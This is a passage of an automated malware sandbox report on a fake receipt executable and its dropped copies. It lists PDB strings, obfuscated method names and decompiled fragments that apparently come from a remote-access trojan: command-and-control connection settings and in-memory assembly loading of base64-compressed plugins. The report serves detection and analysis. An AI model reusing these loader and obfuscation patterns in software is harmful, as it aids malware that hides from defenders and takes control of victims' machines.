            Source: Binary string: \??\C:\Users\user\Desktop\Receipt-#202431029B.PDB source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb` source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbahz source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007523000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdblX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdbxX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdbSHA256 source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdbP source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\RVYv.pdb, source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb@ source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbHH source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Xml.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: o.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: %%.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007519000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp, WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\RVYv.pdbpdbVYv.pdb@V source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RVYv.pdb source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Drawing.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32ine\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs.Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs.Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs.Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: Receipt-#202431029B.exeStatic PE information: 0xF56D7741 [Fri Jun 25 07:31:13 2100 UTC]
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_072EA7F8 pushad ; iretd 0_2_072EA7F9
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C4C push edx; iretd 9_2_08CF6C52
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C44 push edx; iretd 9_2_08CF6C4A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C58 push edx; iretd 9_2_08CF6C5A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C54 push edx; iretd 9_2_08CF6C56
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C64 push edx; iretd 9_2_08CF6C66
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C3C push edx; iretd 9_2_08CF6C42
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C38 push edx; iretd 9_2_08CF6C3A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6C34 push edx; iretd 9_2_08CF6C36
            Source: Receipt-#202431029B.exeStatic PE information: section name: .text entropy: 7.383968480412204
            Source: XetHVID.exe.0.drStatic PE information: section name: .text entropy: 7.383968480412204
            Source: Notepab.exe.8.drStatic PE information: section name: .text entropy: 7.383968480412204
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, POBDkssu7i4qhxHOE3.csHigh entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, gk1r6u3PJ4YZfk0Jh1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, Y73yD1R6ULdWq3LfCi4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, hRfP2401u4Wy3ZaC0d.csHigh entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, u1stuMz0ofr8O7nZFy.csHigh entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, KF1RPYFCnoxs4StQAi.csHigh entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MKwas8PYpZOx8H3OeB.csHigh entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, KIep4jGrIXCGAL9Joj.csHigh entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, yexdJS6ON7njLgLP4l.csHigh entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, u9bLHSjivviXKdE2oQ.csHigh entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, tBrTLvnq24p7uCKflG.csHigh entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, aNCEL9J2T8Vc5DjGvt.csHigh entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, kfPFjHKPrN41PeqK4o.csHigh entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.csHigh entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, w7im7ERRxp7kLH42pxP.csHigh entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, OYAXorN9VyLrWvsBRw.csHigh entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, WBcJyFoFcy9A0CXYMF.csHigh entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, JC2QDIRFrOWcdCwqFkG.csHigh entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, Oggr1D9mrEqm09cS03.csHigh entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MiqhSGVvq03kxUsc87.csHigh entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BK6KfXxNl4cYo1AxVW.csHigh entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, POBDkssu7i4qhxHOE3.csHigh entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, gk1r6u3PJ4YZfk0Jh1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, Y73yD1R6ULdWq3LfCi4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, hRfP2401u4Wy3ZaC0d.csHigh entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, u1stuMz0ofr8O7nZFy.csHigh entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, KF1RPYFCnoxs4StQAi.csHigh entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MKwas8PYpZOx8H3OeB.csHigh entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, KIep4jGrIXCGAL9Joj.csHigh entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, yexdJS6ON7njLgLP4l.csHigh entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, u9bLHSjivviXKdE2oQ.csHigh entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, tBrTLvnq24p7uCKflG.csHigh entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, aNCEL9J2T8Vc5DjGvt.csHigh entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, kfPFjHKPrN41PeqK4o.csHigh entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.csHigh entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, w7im7ERRxp7kLH42pxP.csHigh entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, OYAXorN9VyLrWvsBRw.csHigh entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, WBcJyFoFcy9A0CXYMF.csHigh entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, JC2QDIRFrOWcdCwqFkG.csHigh entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, Oggr1D9mrEqm09cS03.csHigh entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MiqhSGVvq03kxUsc87.csHigh entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BK6KfXxNl4cYo1AxVW.csHigh entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, POBDkssu7i4qhxHOE3.csHigh entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, gk1r6u3PJ4YZfk0Jh1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, Y73yD1R6ULdWq3LfCi4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, hRfP2401u4Wy3ZaC0d.csHigh entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, u1stuMz0ofr8O7nZFy.csHigh entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
